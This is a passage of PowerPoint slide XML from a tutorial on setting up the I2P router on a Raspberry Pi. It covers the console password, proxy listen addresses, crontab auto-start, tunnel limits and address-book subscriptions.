              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>clientApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.0.args=7657 0.0.0.0 ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1786919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Console Password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we do this step, and we don't trust all of the hosts on our LAN, it is probably a good idea to make a router password. Just edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clients.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>~/.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>clients.config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>then add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>line:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>consolePassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SomePassword</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obviously replacing “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SomePassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” with the password you want to use. The logon name is “admin”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3650763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Access to the Proxies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this we have to set the proxies on ports 4444 and 4445 to listen on 0.0.0.0. Edit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i2ptunnel.config:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>~/.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i2ptunnel.config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the lines that look </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>like:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.0.interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=127.0.0.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.6.interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=127.0.0.1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and set them to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>be</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.0.interface=0.0.0.0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tunnel.6.interface=0.0.0.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38898049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and keeping it up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1600200"/>
            <a:ext cx="8991600" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can now start I2P with a simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>runplain.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>what if you want it to start on boot and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sure it’s running at all times, even after a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>crash? Run:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This should bring up an editor so we can add scheduled tasks. Add the following lines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>* * * * /home/pi/i2pbin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>runplain.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>@reboot /home/pi/i2pbin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>runplain.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20510213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Tweaks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="8458200" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If too many resources are being taken by routing for others, you may wish to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>add this to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to your ~/.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>clients.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>router.maxParticipatingTunnels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, to add more sites you you address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>book </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>you can surf to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://&lt;Raspberry Pi's IP&gt;:7657/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>susidns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/subscriptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>add:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>://www.i2p2.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hosts.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://i2host.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/i2hostetag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://stats.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>newhosts.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://tino.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hosts.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://inr.i2p/export/alive-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hosts.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
